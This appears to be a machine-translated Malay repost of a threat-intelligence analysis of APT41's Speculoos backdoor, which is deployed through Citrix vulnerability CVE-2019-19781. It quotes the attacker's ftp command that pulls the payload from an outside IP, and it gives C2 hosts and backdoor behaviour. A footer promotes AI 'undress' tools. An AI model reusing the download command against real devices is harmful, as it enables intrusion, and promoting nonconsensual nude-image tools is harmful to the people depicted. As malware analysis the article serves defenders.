cari
RumahOperasi dan penyelenggaraanKeselamatanCara melakukan analisis pintu belakang APT41 Speculoos

FireEye mengeluarkan laporan mengenai aktiviti serangan global APT41 pada 25 Mac 2020. Kempen serangan ini berlaku antara 20 Januari dan 11 Mac, dan terutamanya menyasarkan peralatan rangkaian Citrix, Cisco dan Zoho. Penyelidik memperoleh sampel serangan 'Speculoos' yang menyasarkan peranti Citrix berdasarkan data WildFire dan AutoFocus dan juga mengenal pasti mangsa dalam pelbagai industri di seluruh dunia, termasuk Amerika Utara, Amerika Selatan dan Eropah.

如何进行APT41 Speculoos后门分析

Speculoos dilaksanakan berdasarkan FreeBSD Sebanyak lima sampel telah dikenal pasti Saiz fail semua sampel pada dasarnya adalah sama, dan terdapat perbezaan kecil antara set sampel. Speculoos mengeksploitasi CVE-2019-19781 untuk penyebaran serangan CVE-2019-19781 mempengaruhi Pengawal Penghantaran Aplikasi Citrix, Citrix Gateway dan Citrix SD-WAN WANOP, membolehkan penyerang melaksanakan arahan sewenang-wenangnya dari jauh.

Butiran serangan

Penyerang mengeksploitasi CVE-2019-19781 untuk melaksanakan arahan dari jauh: '/usr/bin/ftp -o /tmp/bsd ftp://test: [ disunting ]@ 66.42.98[.]220/'.

Gelombang serangan pertama bermula pada petang 31 Januari 2020, menggunakan fail bernama bsd, yang menjejaskan beberapa institusi pendidikan tinggi di Amerika Syarikat, institusi perubatan Amerika dan syarikat perunding Ireland. Gelombang kedua serangan bermula pada 24 Februari 2020, menggunakan nama fail un dan mempengaruhi institusi pengajian tinggi Colombia, organisasi pembuatan Austria, institusi pengajian tinggi AS dan kerajaan negeri di Amerika Syarikat.

Perisian hasad berdasarkan sistem BSD agak jarang berlaku Alat ini berkaitan dengan peranti rangkaian Citrix tertentu, jadi Speculoos berkemungkinan dibangunkan oleh organisasi APT41 khusus untuk aktiviti serangan ini.

Analisis Perduaan

Pintu belakang Speculoos, boleh laku ELF yang disusun dengan GCC 4.2.1, boleh dijalankan pada sistem FreeBSD. Muatan tidak dapat mengekalkan kawalan berterusan ke atas sasaran, jadi penyerang menggunakan komponen tambahan atau kaedah serangan lain untuk mengekalkan kawalan. Selepas melaksanakan pintu belakang, gelung akan dimasukkan, yang berkomunikasi dengan domain C2 melalui port 443 dan memanggil fungsi

alibaba.zzux[.]com (119.28.139[.] 120)

Apabila terdapat masalah komunikasi, Speculoos akan cuba menyambung ke pelayan C2 sandaran melalui port 443, yang alamat IPnya ialah 119.28.139[.]20. Jika disambungkan ke mana-mana pelayan C2, ia akan melakukan jabat tangan TLS dengan pelayan. Rajah 1 menunjukkan paket yang dihantar ke pelayan C2.

如何进行APT41 Speculoos后门分析

Ia meminta log masuk.live[.]com sebagai Petunjuk Nama Pelayan (SNI).

如何进行APT41 Speculoos后门分析

Selepas berjaya menyambung ke C2 dan melengkapkan jabat tangan TLS, Speculoos akan cap jari sistem sasaran dan menghantar semula data ke pelayan C2. Strukturnya ditunjukkan dalam Jadual 1 di bawah.

如何进行APT41 Speculoos后门分析

Data dihantar melalui saluran TLS dan Speculoos menunggu respons dua bait daripada pelayan. Selepas menerima respons, ia menghantar bait (0xa) ke C2 dan memasuki gelung menunggu arahan. Jadual 2 menunjukkan arahan yang boleh dilakukan oleh penyerang, membolehkan penyerang mengawal sepenuhnya sistem mangsa.

如何进行APT41 Speculoos后门分析

Kedua-dua sampel Speculoos yang dianalisis dalam kajian adalah sama dari segi fungsi, dengan hanya lapan bait berbeza antara mereka, 'nama hos' apabila mengumpul maklumat sistem Disebabkan oleh perbezaan daripada arahan 'uname -s'. uname -s mengembalikan maklumat kernel, nama hos mengembalikan nama sistem hos. Imej di bawah menunjukkan perbandingan binari antara dua sampel Speculoos.

如何进行APT41 Speculoos后门分析

Penilaian Impak

Peranti boleh akses Internet yang membenarkan pengguna yang tidak dibenarkan melaksanakan kod dari jauh akan membawa isu keselamatan yang ketara, CVE- 2019-19781 mempengaruhi berbilang peranti yang menghadap ke internet, dengan penyerang secara aktif mengeksploitasi kelemahan ini untuk memasang pintu belakang tersuai. Penyerang boleh memantau atau mengubah suai keseluruhan aktiviti rangkaian organisasi kerana semua aktiviti rangkaian organisasi yang terjejas mesti melalui peranti rangkaian ini.

Secara lalai, peranti ini boleh mengakses terus sistem organisasi dan penyerang tidak perlu mempertimbangkan isu pergerakan sisi dalam rangkaian dalaman. Penyerang siber mempunyai beberapa kaedah serangan, seperti mengubah data rangkaian, menyuntik kod hasad, melakukan serangan man-in-the-middle, atau memikat pengguna ke halaman log masuk palsu untuk mencuri maklumat log masuk.

Atas ialah kandungan terperinci Cara melakukan analisis pintu belakang APT41 Speculoos. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan
Artikel ini dikembalikan pada:亿速云. Jika ada pelanggaran, sila hubungi admin@php.cn Padam

Alat AI Hot

Undresser.AI Undress

Undresser.AI Undress

Apl berkuasa AI untuk mencipta foto bogel yang realistik

AI Clothes Remover

AI Clothes Remover

Alat AI dalam talian untuk mengeluarkan pakaian daripada foto.

Undress AI Tool

Undress AI Tool

Gambar buka pakaian secara percuma

Clothoff.io

Clothoff.io

Penyingkiran pakaian AI

Video Face Swap

Video Face Swap

Tukar muka dalam mana-mana video dengan mudah menggunakan alat tukar muka AI percuma kami!

Alat panas

SecLists

SecLists

SecLists ialah rakan penguji keselamatan muktamad. Ia ialah koleksi pelbagai jenis senarai yang kerap digunakan semasa penilaian keselamatan, semuanya di satu tempat. SecLists membantu menjadikan ujian keselamatan lebih cekap dan produktif dengan menyediakan semua senarai yang mungkin diperlukan oleh penguji keselamatan dengan mudah. Jenis senarai termasuk nama pengguna, kata laluan, URL, muatan kabur, corak data sensitif, cangkerang web dan banyak lagi. Penguji hanya boleh menarik repositori ini ke mesin ujian baharu dan dia akan mempunyai akses kepada setiap jenis senarai yang dia perlukan.

PhpStorm versi Mac

PhpStorm versi Mac

Alat pembangunan bersepadu PHP profesional terkini (2018.2.1).

Versi Mac WebStorm

Versi Mac WebStorm

Alat pembangunan JavaScript yang berguna

Notepad++7.3.1

Notepad++7.3.1

Editor kod yang mudah digunakan dan percuma

DVWA

DVWA

Damn Vulnerable Web App (DVWA) ialah aplikasi web PHP/MySQL yang sangat terdedah. Matlamat utamanya adalah untuk menjadi bantuan bagi profesional keselamatan untuk menguji kemahiran dan alatan mereka dalam persekitaran undang-undang, untuk membantu pembangun web lebih memahami proses mengamankan aplikasi web, dan untuk membantu guru/pelajar mengajar/belajar dalam persekitaran bilik darjah Aplikasi web keselamatan. Matlamat DVWA adalah untuk mempraktikkan beberapa kelemahan web yang paling biasa melalui antara muka yang mudah dan mudah, dengan pelbagai tahap kesukaran. Sila ambil perhatian bahawa perisian ini